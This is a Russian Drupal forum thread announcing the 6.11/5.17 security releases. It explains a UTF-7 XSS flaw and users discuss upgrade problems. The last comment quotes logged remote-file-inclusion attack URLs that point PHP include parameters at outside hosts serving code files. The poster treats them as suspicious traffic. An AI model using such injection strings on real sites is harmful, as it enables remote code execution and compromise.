Обновляемся Drupal 6.11 и 5.17

Главные вкладки

Аватар пользователя EllECTRONC EllECTRONC 30 апреля 2009 в 5:08

Вчера (April 29, 2009 - 23:36) -- это случилось снова! )

Доступны для загрузки релизы Drupal 6.11 и 5.17, устраняющие проблемы критической уязвимости безопасности. В Drupal 6.11 так же пофикшены проблемы производительности с кешем меню и кэшем состояния обновления (update status) совместно с другими мелкими проблемами.

Чтобы устранить проблемы безопасности вы можете использовать патчи к друпалу:
SA-CORE-2009-005 - Drupal core - Cross site scripting

Однако рекомендуется делать полное обновление, так как патчи не содержат фиксы дополнительных багов, которые включены в релизы. Применение патча оставит ваш сайт в состоянии unversioned ))) и смутит модуль update status, который будет напоминать вам обновиться до 6.11 или 5.17. (дословно)))

Обновление сайтов на Drupal 5 и 6 очень рекомендуется. Новых особенностей в этих релизах нет. Подробнее о релизах серии Drupal 6.x — Релизы Drupal 6.0, подробнее о релизах 5.x вы найдете на Релизы Drupal 5.0.

Описание

Выводя предоставленные пользователем данные Drupal раскрывает потенциально опасные атрибуты и тэги HTML или избегает символы, у которых есть специальное значение в HTML. Эта фильтрация вывода предохраняет сайт против межсайтового скриптинга (XSS) через пользовательский ввод.

Определенные последовательности байта, которые правильны в спецификации UTF-8, потенциально опасны когда интерпретированы как UTF-7. Internet Explorer 6 и 7 могут расшифровать эти символы как UTF-7, если они появляются перед тегом , который определяет содержание страницы как UTF-8, несмотря на то, что Drupal также посылает реальный заголовок HTTP, определяющий содержание как UTF-8. Это поведение дает возможность злонамеренным пользователям вставить и выполнить Javascript в контексте вебсайта, если посетителям сайта разрешается постить.

У Wikipedia есть больше информации о межсайтовом скриптинге (XSS).

Кроме того, у ядра Drupal также есть очень ограниченная информационная уязвимость раскрытия при очень определенных условиях. Если пользователь обманут при посещение сайта через специально обработанный URL и затем сабмитит форму (такую как окно поиска) от той страницы, информация в форме может быть направлена к стороннему сайту по URL, и таким образом раскрыта третьему лицу. Тогда сайт третьего лица может выполнить нападение CSRF на форму отправки.

Эта уязвимость ограничена формами, представленными на главной странице (frontpage). Форма регистрации пользователей не уязвима.

Важная заметка к обновлению

Очень важно запускать update.php. Эти релизы не изменяют файлы .htaccess, robots.txt и (default.)settings.php, так что вы можете оставить эти файлы как есть, если вы их модифицировали.

WARNING

Как сообщил orb, релиз 5.17 конфликтует с Advanced Forum, так что будьте внимательнее при обновлении и делайте бэкапы.

P.S.:

Кого еще тут не устраивает перевод и он не способен предложить другой вариант перевода, то милости просят на орге:
Drupal 6.11 and 5.17 released

Комментарии

Аватар пользователя azsx azsx 30 апреля 2009 в 5:36

подскажите пожалуйста, а после обновления не с версии 6,9 не будет нарушен перевод. То есть останется ли на сайте русский язык?

Аватар пользователя EllECTRONC EllECTRONC 30 апреля 2009 в 5:51

перевод никуда не денется, так как таблицы локили не затронуты и, к тому же, они (таблицы с переводами) находятся в БД Smile

Аватар пользователя v1adimir v1adimir 30 апреля 2009 в 6:33

> также работа затруднительных положений выходит с тайником меню
> и тайником статуса обновления среди других меньших проблем

есть ли смысл с переводить новости с более-менее понятного английского на подобный псевдо-русский?

Аватар пользователя EllECTRONC EllECTRONC 30 апреля 2009 в 6:45

упс.. не заметила... это просто дубль предложения

"v1adimir" wrote:
есть ли смысл с переводить...

у вас по-русски тоже красиво получается Smile

Читайте по английски кто вам запрещает то?

Аватар пользователя PVasili PVasili 30 апреля 2009 в 14:35

"<a href="mailto:logrise@drupal.org">logrise@drupal.org</a>" wrote:
Пока на Друпалере только 6.10 доступна. Её качать?
, а-га.. ещё не выпотрошилось на выдачу...

Аватар пользователя Anodonta Anodonta 30 апреля 2009 в 14:52

Обновление прошло прекрасно.
Был я в это время "внутри сайта", а по FTP закачал с заменой обновление.
Перезагрузил страницу кнопочкой F5 на клавиатуре, - сайтик не умер Smile
Запустил апдейт базы мышкой и всё без ошибок на экране.

Очень хочется, чтобы и далее уровень бесплатного обслуживания сайтов на друпал был таким же высоким Smile

Аватар пользователя orb orb 30 апреля 2009 в 17:55

мне не тяжело скопировать, но все же интересно

неужели за 3-4 месяца между обновлениями тяжело положить свежий скрипт ?!!
а может нужна именно эта версия?

Аватар пользователя PVasili PVasili 30 апреля 2009 в 18:50

Да уж... Может кто поможет с объяснениями англосаксам глупости с установки модуля, для проверки 1 файла...

Аватар пользователя kovtunos kovtunos 30 апреля 2009 в 21:35

«Очень важно запустить update.php»

Запустил. Вот результат:

An unrecoverable error has occurred. You can find the error message below. It is advised to copy it to the clipboard for reference.
Пожалйста, откройте the error page
An HTTP error 403 occurred. http://site.com/update.php?id=79&op=do

На error page уведомление:

The update process was aborted prematurely while running update #6050 in system.module.
All errors have been logged.

Что делать?

Аватар пользователя andypost@drupal.org andypost@drupal.org 30 апреля 2009 в 22:56

"PVasili" wrote:
Да уж... Может кто поможет с объяснениями англосаксам глупости с установки модуля, для проверки 1 файла...

Василий, ну что за глупости - для перекрытия версии есть модуль jquery update - с какой-такой радости можно обновить ядро и снести совместимость с половиной contrib

Собственно для совместимости версия замораживается или из-за лени поставить модуль нужно ломать кучу модулей для 5ки?

Давайте не изобретать велосипед, и не спамить в issues - там ведь написали, что этого никто не допустит (wont fix)

Аватар пользователя neochief neochief 30 апреля 2009 в 23:48

orb, EllECTRONC, PVasili, это же очевидно. Многим нужна старая версия джейквери, так как от релиза к релизу джейквери притерпевает больших изменений и кое какие скрипты просто не работают с новой версией. Если вам нужна новая версия — ставьте JQuery Update. Если нужна старая — оставляйте как есть. Все просто. Если бы версия обновилась в ядре, за бортом бы остались сайты с депендос на старый джейквери.

UPD> Праведный гнев вырвался одновременно с Andypost'ом Smile

Аватар пользователя PVasili PVasili 1 мая 2009 в 0:07

neochief,andypost@drupal.org - я же говорил, нам не понять тупой логики янков (и такого же юмора)...
Можно было сразу ответить, что есть проблемы с другими модулями?
Как можно понять с его 1 ответа, что вместо обновления 1 файла, нужно ставить целый модуль... Smile

Аватар пользователя andyceo andyceo 1 мая 2009 в 0:58

PVasili

нам не понять тупой логики янков

Василий, прежде чем обвинять разработчиков Drupal в тупости, удосужились бы хоть для начала выяснить причины, по которым замораживается версия jQuery. Выше вам neochief и andypost@drupal.org все подробно разжевали, что вы жалуетесь на то, что вам на англоязычном сайте плохо разжевали?

Это Open Source, здесь вам никто ничего должен и ничем не обязан. Не хотите сами копаться в причинах того или иного решения в Drupal - вам никто не разжует и в рот не положит, по крайней мере, не обязан этого делать. Но это отнюдь не повод обзывать кого-то тупым.

В общем, считаю ваше поведение недопустимым к разработчикам Drupal, тем более здесь, на официальном сайте drupal.ru, и тем более - для старожила проекта.

Акселю: предлагаю забанить PVasili на сайте drupal.ru на неделю, причина озвучена выше.

Аватар пользователя andypost@drupal.org andypost@drupal.org 1 мая 2009 в 2:28

"PVasili" wrote:
Как можно понять с его 1 ответа, что вместо обновления 1 файла, нужно ставить целый модуль... :)

Понять - просто, такой мысли просто возникнуть не может у человека понимающего про циклы разработки...

Аватар пользователя EllECTRONC EllECTRONC 1 мая 2009 в 2:51

"kovtunos" wrote:
«Очень важно запустить update.php»

Это всегда пишут, но нужно самому смотреть надо или не надо. Запускаете, потом смотрите есть ли обновление и, если есть выполняете. Там же несколько шагов.
"kovtunos" wrote:
Что делать?

С бэкапа восстанавливать.
"PVasili" wrote:
Как можно понять с его 1 ответа, что вместо обновления 1 файла, нужно ставить целый модуль... :)

Вообще то, если ставить модуль, то копировать там не 1 файл Smile

скопировать то не сложно.... модуль то у меня стоит...

Аватар пользователя PVasili PVasili 1 мая 2009 в 13:02

andyceo - научитесь читать ВНИМАТЕЛЬНО. И свои предложения озвучивайте в другом месте и в другое время (логика мышления и личность - немного разные вещи). Пока предупреждение...

andypost 2-го ответа ответа от янки было вполне достаточно, можно было сразу на это указать, меньше было бы вопросов от людей измученных Win-дой. Используя win, я при обновлении OS или SP даже не задумываюсь, что у меня не будут работать половина установленного софта. Это абсолютно нелогично и ненормально... Wink

Аватар пользователя orb orb 1 мая 2009 в 12:23

"andyceo" wrote:
Это Open Source, здесь вам никто ничего должен и ничем не обязан. Не хотите сами копаться в причинах того или иного решения в Drupal - вам никто не разжует и в рот не положит, по крайней мере, не обязан этого делать. Но это отнюдь не повод обзывать кого-то тупым.
только не нужно так сразу наезжать, вас тоже можно банить Smile
Если опен-соурс, так можно смотреть и с другой стороны - Мы обновили ядро, обновили скрипты, а то что теперь перестали работать некоторые модули, так это проблема того кто делал модули. Вам никто ничем не обязан что вы на сайт налепили 30 левых модулей, которые наделали начинающие разработчики
"не хотите сами копаться в причинах того или иного решения в Drupal - вам никто не разжует и в рот не положит, по крайней мере, не обязан этого делать." (с)

Аватар пользователя EllECTRONC EllECTRONC 10 ноября 2015 в 11:46

"andyceo" wrote:
Акселю: предлагаю забанить PVasili на сайте drupal.ru на неделю, причина озвучена выше.

Вот Акселю больше делать нечего. Если по вашему так надо будет банить новичков за тупые и просто глупые вопросы, да!? Давайте еще сделаем наше сообщество закрытым!?

2orb, Спасибо учтем. Восстанавливайтесь из бэкапа.

А вообще мне кажется что и с 6-ой обновление не прошло гладко. После вот этого обновления у меня на некоторых страницах не догружаются скрипты и получается такая вот фигня.. прикрепленная в аттаче.
Короче не свернуть не развернуть... Sad

Аватар пользователя dimmer dimmer 2 мая 2009 в 19:06

Такой вопрос: что может произойти, если не отключать все дополнительные модули при обновлении, так ли это необходимо?

Аватар пользователя EllECTRONC EllECTRONC 2 мая 2009 в 19:41

"dimmer" wrote:
Такой вопрос: что может произойти, если не отключать все дополнительные модули при обновлении, так ли это необходимо?

никогда не отключала :)… главное сделать бэкап Smile
наверно это чтобы не было так как с Advanced Forum…

Аватар пользователя SylarSAI SylarSAI 3 мая 2009 в 14:28

Скажите а прирост производительности есть в новой версии? А то у меня основная трабла так это php ограничение памяти Sad ...

Аватар пользователя SylarSAI SylarSAI 3 мая 2009 в 17:47

да меня wsod достал... причем не пойму что за лажа... хостер (hoster.ru) дал 32мб на php... Вкл. модули ( Ядро-обязательное. Blog, Contact, Comment, Forum, Locale, Menu, PHP filter, Poll, Profile, Search, Taxonomy, Throttle, Private messages, OG, Google Analytics, Tagadelic, Taxonomy Menu, Views, Vote Up/Down, Voting API, BUEditor)
начинаю что то менять в модулях(настройки)... да или update.php забускаю... так wsod выскакивет Sad про подключение доп. модулей помимо я вообще молчу... Sad

Аватар пользователя andypost@drupal.org andypost@drupal.org 4 мая 2009 в 5:27

Рекомендую обратить внимание на то, что все встроенные темы изменены:

Подробности http://drupal.org/files/sa-core-2009-005/SA-CORE-2009-005-6.10.patch

http://drupal.org/drupal-6.11 немного описывает саму уязвимость, и похоже нужно делать вывод title после head

Обновлено! именно после title и походу это реально горячка которую в скорой 6.12 поправят...

Аватар пользователя neochief neochief 4 мая 2009 в 0:35

"<a href="mailto:andypost@drupal.org">andypost@drupal.org</a>" wrote:
и похоже нужно делать вывод title до head

В точности наоборот, вероятно вы опечатались.

Хедеры стоит выводить ДО тайтла. Честно говоря, причина уязвимости из описания на drupal.org, мне лично, смутно понятна, но симптомы такие: если юзер пользует ИЕ6-7, и кодировка документа явно не определена (что происходит при интерпретации тайтла, если он перед ), то некая последовательность байтов может интерпретироваться этими браузерами как UTF-7, и соответственно, при правильно сформированном тайтле, приводить к запуску скрипта, закодированного в тайтле (например, если вы запускаете поиск, то у вас в тайтле же отображаются кейворды, поэтому можно подать какой-то тупой серч и вы запустите скрипт в тайтле).

Недавно видел на хабре описание подобного прикола, но, похоже, это уже другая история.

Аватар пользователя neochief neochief 4 мая 2009 в 4:10

"Ilya1st" wrote:
ты хочешь сказать - вывод http-equiv ДВАЖДЫ - как это сейчас происходит - сделан намеренно как временное решение проблемы

Я думаю, что Дрис комитил этот патч в дупель пьяный или за 5 минут до вылета самолета, потому что как-то странно, что такой тупой фикс прошел в ядро. Скорее всего в 6.12 его приведут к уму-разуму. Если делать тему прямыми руками, то той новой приблуды drupal_final_markup() совсем не нужно, т.к. Content-Type и так вставляется первым в $head. Но, для тех, кто забил на $head, видимо и предназначен этот сакральный фикс, так как он заменяет при любом открытии страницы <head> на <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" />, т.е. форсированно вставляет спереди Content-Type.

Кстати, в моем предыдущем комменте я имел в виду именно <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />, но по каким-то странным причинам, отредактировать тот коммент я уже не могу.

Аватар пользователя andypost@drupal.org andypost@drupal.org 4 мая 2009 в 5:48

"PVasili" wrote:
например в .htaccess -> AddDefaultCharset UTF-8 и забыли о проблеме

Сомневаюсь, что ИЕ6 будет адекватно реагировать на этот http заголовок, реально приоритет http заголовка и head определения charset разный в разных браузерах, у меня просто инет сейчас не стабильный - так что лучше поставить это как заглушку, может пока разберутся на d.o как оно правильнее.

http://drupal.org/node/449142 вот тема поднята

PS: Вчера заехал в Харьков на дней 10, а тут что-то с каналом...

Аватар пользователя PVasili PVasili 4 мая 2009 в 9:55

"<a href="mailto:andypost@drupal.org">andypost@drupal.org</a>" wrote:
Сомневаюсь, что ИЕ6 будет адекватно реагировать на этот http заголовок, реально приоритет http заголовка и head определения charset разный в разных браузерах,

У осла первичен заголовок от сервера. И кстати, он определяется 1 раз, после чего его нельзя уже сменить(по ходу файла). Try поэкспериментировать.

Аватар пользователя Алешка Алешка 4 мая 2009 в 15:23

Пожелание: На страничке загрузки дистрибутивов указывать минимальные требования к версиям PHP, MySQL и прочее. Полезно будет, если кто выбирает хостинг. Ибо не все хостеры дают нужные возможности или при заказе хостинга заранее оговариваются эти требования. Информация эта доступна на drupal.org, однако (ИМХО) здесь она лишней не будет.

Аватар пользователя PVasili PVasili 13 мая 2009 в 10:24

Сегодня в таблице cache_page обнаружил такие интересные вещи:

.../dokeos/claroline/auth/ldap/authldap.php?includePath=http://www.ladyboss.com.ua/images/fx29id2.txt???
.../claroline/auth/ldap/authldap.php?includePath=http://www.ladyboss.com.ua/images/fx29id2.txt???
.../?fckphp_config[basedir]=http://www.ionthenet.co.kr/note_log/ec.txt?
.../?_SERVER[DOCUMENT_ROOT]=http://www.ionthenet.co.kr/note_log/ec.txt?

»
интересно сайты тихо хакнуты или сами владельцы подставляются?